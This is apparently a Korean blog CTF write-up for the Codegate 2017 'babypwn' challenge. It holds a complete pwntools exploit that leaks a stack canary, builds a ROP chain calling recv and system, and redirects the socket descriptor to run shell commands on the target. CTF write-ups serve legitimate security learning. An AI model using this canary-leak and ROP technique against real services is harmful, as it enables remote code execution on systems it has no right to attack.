반응형
babypwn전형적인 bof 문제다 ROP 사용하면 해서 system 실행시키고
소켓으로 fd redirect 시켜서 플래그 확인해면 됌
아래는 Exploit.py
from pwn import *
con = remote("192.168.0.14", 9191) # local
#con = remote("110.10.212.130", 8888) # codegate
def dummy():
con.recvn(276)
def canary_leak():
print "[*] Canary Leak"
con.recvuntil("3. Exit\n")
con.recvuntil("===============================\n")
con.send("1\x00")
con.recvuntil("Input Your Message : ")
con.sendline("A"*40)
con.recvn(40)
canary = con.recvn(4)[::-1]
print "canary : " + hex(int(canary.encode("hex"), 16))
return int(canary.encode("hex"), 16)
def ROP():
canary = canary_leak()
print "[*] ROP Stage"
worker = 0x08048A71
pop3ret = 0x8048eec
system_plt = 0x8048620
recv_plt = 0x80486e0
bss = 0x804b1b4
gadget = "/bin/ls 0>&4 1>&4\x00"
print "[*] Pre-Payload Send"
con.recvuntil("3. Exit\n")
con.recvuntil("===============================\n")
con.sendline("1")
con.recvuntil("Input Your Message : ")
payload = ""
payload += "A" * 40
payload += p32(canary)
payload += "B" * 12
payload += p32(recv_plt)
payload += p32(pop3ret)
payload += p32(0x04) # socket
payload += p32(bss)
payload += p32(len(gadget))
payload += p32(0x00)
payload += p32(system_plt)
payload += p32(0x41414141)
payload += p32(bss)
con.sendline(payload)
print "[*] Canary Null Inject"
con.recvuntil("3. Exit\n")
con.recvuntil("===============================\n")
con.sendline("1")
con.recvuntil("Input Your Message : ")
payload = ""
payload += "A" * 40
payload += "\x00"
con.send(payload)
print "[*] Triggering"
con.recvuntil("3. Exit\n")
print con.recvuntil("===============================\n")
con.sendline("3") # triggering
con.sendline(gadget)
con.interactive()
ROP()
'Write up > CTF' 카테고리의 다른 글
| [RCTF 2017] RCalc (0) | 2017.05.22 |
|---|---|
| [Codegate2017 Pre] EasyCrack101 (0) | 2017.02.11 |
| [Codegate2017 Pre] BabyMISC (0) | 2017.02.11 |
| [RC3 2016] IMS-easy (150pt) *수정 (0) | 2016.11.20 |
| [CSAW_2014] Xorcise(Pwnable500) (0) | 2016.07.30 |
KuroNeko_
KuroNeko